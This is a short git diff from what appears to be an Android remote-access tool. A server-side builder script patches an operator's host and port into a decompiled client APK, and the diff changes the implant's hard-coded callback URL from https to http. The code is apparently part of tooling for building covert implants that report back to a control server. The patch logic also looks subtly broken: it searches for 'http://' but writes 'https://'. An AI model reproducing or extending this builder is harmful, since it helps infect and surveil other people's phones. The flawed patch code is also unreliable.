diff --git a/client/app/app.iml b/client/app/app.iml
index d14dc26..0d03c40 100644
--- a/client/app/app.iml
+++ b/client/app/app.iml
@@ -19,7 +19,7 @@
-
+
diff --git a/server/app/factory/decompiled/smali/com/remote/app/h.smali b/server/app/factory/decompiled/smali/com/remote/app/h.smali
index e977ef7..e6038b5 100644
--- a/server/app/factory/decompiled/smali/com/remote/app/h.smali
+++ b/server/app/factory/decompiled/smali/com/remote/app/h.smali
@@ -64,7 +64,7 @@
invoke-direct {v1}, Ljava/lang/StringBuilder;->()V
- const-string v2, "https://xwizer.herokuapp.com:443?model="
+ const-string v2, "http://xwizer.herokuapp.com:443?model="
invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
diff --git a/server/includes/apkBuilder.js b/server/includes/apkBuilder.js
index f0b11fe..c2e7427 100644
--- a/server/includes/apkBuilder.js
+++ b/server/includes/apkBuilder.js
@@ -23,7 +23,7 @@ function patchAPK(URI, PORT, cb) {
if (PORT < 25565) {
fs.readFile(CONST.patchFilePath, 'utf8', function (err, data) {
if (err) return cb('File Patch Error - READ')
- var result = data.replace(data.substring(data.indexOf("https://"), data.indexOf("?model=")), "https://" + URI + ":" + PORT);
+ var result = data.replace(data.substring(data.indexOf("http://"), data.indexOf("?model=")), "https://" + URI + ":" + PORT);
fs.writeFile(CONST.patchFilePath, result, 'utf8', function (err) {
if (err) return cb('File Patch Error - WRITE')
else return cb(false)